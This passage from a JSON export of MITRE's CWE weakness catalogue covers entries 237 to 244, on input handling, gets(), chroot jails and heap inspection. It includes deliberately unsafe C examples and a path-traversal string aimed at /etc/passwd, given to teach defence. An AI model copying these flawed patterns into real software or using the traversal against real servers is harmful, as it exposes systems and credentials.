Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1488","Description":"Crash in IRC client via PART message from a channel the user is not in.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1488"},{"Reference":"CVE-2001-0650","Description":"Router crash or bad route modification using BGP updates with invalid transitive attribute.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0650"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Undefined Parameter Error"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Undefined Parameter Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Undefined Parameter","attr":{"@_Date":"2009-03-10"}}]}},"237":{"attr":{"@_ID":"237","@_Name":"Improper Handling of Structural Elements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not handle or incorrectly handles inputs that are related to complex structures.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"228","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Element Problems"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Element Problems","attr":{"@_Date":"2009-03-10"}}}},"238":{"attr":{"@_ID":"238","@_Name":"Improper Handling of Incomplete Structural Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when a particular structural element is not completely specified.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"237","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Element Error"}},"Notes":{"Note":{"#text":"Can be primary to other problems.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Missing Element Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Missing Element","attr":{"@_Date":"2009-03-10"}}]}},"239":{"attr":{"@_ID":"239","@_Name":"Failure to Handle Incomplete Element","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly handle when a particular element is not completely specified.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"237","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"404","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1532","Description":"HTTP GET without \\\\r\\\\n\\\\r\\\\n CRLF sequences causes product to wait indefinitely and prevents other users from accessing it.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1532"},{"Reference":"CVE-2003-0195","Description":"Partial request is not timed out.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0195"},{"Reference":"CVE-2005-2526","Description":"MFV. CPU exhaustion in printer via partial printing request then early termination of connection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2526"},{"Reference":"CVE-2002-1906","Description":"CPU consumption by sending incomplete HTTP requests and leaving the connections open.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1906"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Incomplete Element"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Incomplete Element","attr":{"@_Date":"2008-04-11"}}}},"240":{"attr":{"@_ID":"240","@_Name":"Improper Handling of Inconsistent Structural Elements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when two or more structural elements should be consistent, but are not.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"237","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Inconsistent Elements"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Inconsistent Elements","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Resolve Inconsistent Elements","attr":{"@_Date":"2009-03-10"}}]}},"241":{"attr":{"@_ID":"241","@_Name":"Improper Handling of Unexpected Data Type","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when a particular element is not the expected type, e.g. it expects a digit (0-9) but is provided with a letter (A-Z).","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"228","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1156","Description":"FTP server crash via PORT command with non-numeric character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1156"},{"Reference":"CVE-2004-0270","Description":"Anti-virus product has assert error when line length is non-numeric.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0270"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Wrong Data Type"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO37-C","Entry_Name":"Do not assume that fgets() or fgetws() returns a nonempty string when successful","Mapping_Fit":"CWE More Abstract"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"48"}}},"Notes":{"Note":{"#text":"Probably under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Wrong Data Type","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Wrong Data Type","attr":{"@_Date":"2009-03-10"}}]}},"242":{"attr":{"@_ID":"242","@_Name":"Use of Inherently Dangerous Function","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program calls a function that can never be guaranteed to work safely.","Extended_Description":"Certain functions behave in dangerous ways regardless of how they are used. Functions in this category were often implemented without taking security concerns into account. The gets() function is unsafe because it does not perform bounds checking on the size of its input. An attacker can easily send arbitrarily-sized input to gets() and overflow the destination buffer. Similarly, the &gt;&gt; operator is unsafe to use when reading into a statically-allocated character array because it does not perform bounds checking on the size of its input. An attacker can easily send arbitrarily-sized input to the &gt;&gt; operator and overflow the destination buffer.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1177","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Implementation","Requirements"],"Description":"Ban the use of dangerous functions. Use their safe equivalent."},{"Phase":"Testing","Description":"Use grep or static analysis tools to spot usage of dangerous functions."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The code below calls gets() to read information into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char buf[BUFSIZE];gets(buf);","xhtml:br":""}},"Body_Text":"The gets() function in C is inherently unsafe."},{"attr":{"@_Demonstrative_Example_ID":"DX-5"},"Intro_Text":"The code below calls the gets() function to read in data from the command line.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"}","xhtml:div":{"#text":"char buf[24];printf(\\"Please enter your name and press &lt;Enter&gt;\\\\n\\");gets(buf);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":"However, gets() is inherently unsafe, because it copies all input from STDIN to the buffer without checking size. This allows the user to provide a string that is larger than the buffer size, resulting in an overflow condition."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Dangerous Functions"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS33-C","Entry_Name":"Do not use vfork()","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-194","@_Section":"Chapter 5. Working with I/O"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;gets and fgets&#34; Page 163"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings, Type, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Dangerous Functions","attr":{"@_Date":"2008-01-30"}},{"#text":"Use of Inherently Dangerous Functions","attr":{"@_Date":"2008-04-11"}}]}},"243":{"attr":{"@_ID":"243","@_Name":"Creation of chroot Jail Without Changing Working Directory","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program uses the chroot() system call to create a jail, but does not change the working directory afterward. This does not prevent access to files outside of the jail.","Extended_Description":"Improper use of chroot() may allow attackers to escape from the chroot jail. The chroot() function call does not change the process\'s current working directory, so relative paths may still refer to file system resources outside of the chroot jail after chroot() has been called.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"Unix","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"The chroot() system call allows a process to change its perception of the root directory of the file system. After properly invoking chroot(), a process cannot access any files outside the directory tree defined by the new root directory. Such an environment is called a chroot jail and is commonly used to prevent the possibility that a processes could be subverted and used to access unauthorized files. For instance, many FTP servers run in chroot jails to prevent an attacker who discovers a new vulnerability in the server from being able to download the password file or other sensitive files on the system."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Files or Directories"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider the following source code from a (hypothetical) FTP server:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"chroot(\\"/var/ftproot\\");...fgets(filename, sizeof(filename), network);localfile = fopen(filename, \\"r\\");while ((len = fread(buf, 1, sizeof(buf), localfile)) != EOF) {}fclose(localfile);","xhtml:br":["","","","",""],"xhtml:div":{"#text":"fwrite(buf, 1, sizeof(buf), network);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"This code is responsible for reading a filename from the network, opening the corresponding file on the local machine, and sending the contents over the network. This code could be used to implement the FTP GET command. The FTP server calls chroot() in its initialization routines in an attempt to prevent access to files outside of /var/ftproot. But because the server does not change the current working directory by calling chdir(\\"/\\"), an attacker could request the file \\"../../../../../etc/passwd\\" and obtain a copy of the system password file."}},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Directory Restriction"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP17","Entry_Name":"Failed chroot jail"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Background_Details, Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Causal_Nature, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":[{"#text":"Directory Restriction","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Change Working Directory in chroot Jail","attr":{"@_Date":"2010-12-13"}}]}},"244":{"attr":{"@_ID":"244","@_Name":"Improper Clearing of Heap Memory Before Release (\'Heap Inspection\')","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Using realloc() to resize buffers that store sensitive information can leave the sensitive information exposed to attack, because it is not removed from memory.","Extended_Description":"When sensitive data such as a password or an encryption key is not removed from memory, it could be exposed to an attacker using a \\"heap inspection\\" attack that reads the sensitive data using memory dumps or other methods. The realloc() function is commonly used to increase the size of a block of allocated memory. This operation often requires copying the contents of the old memory block into a new and larger block. This operation leaves the contents of the original block intact but inaccessible to the program, preventing the program from being able to scrub sensitive data from memory. If an attacker can later examine the contents of a memory dump, the sensitive data could be 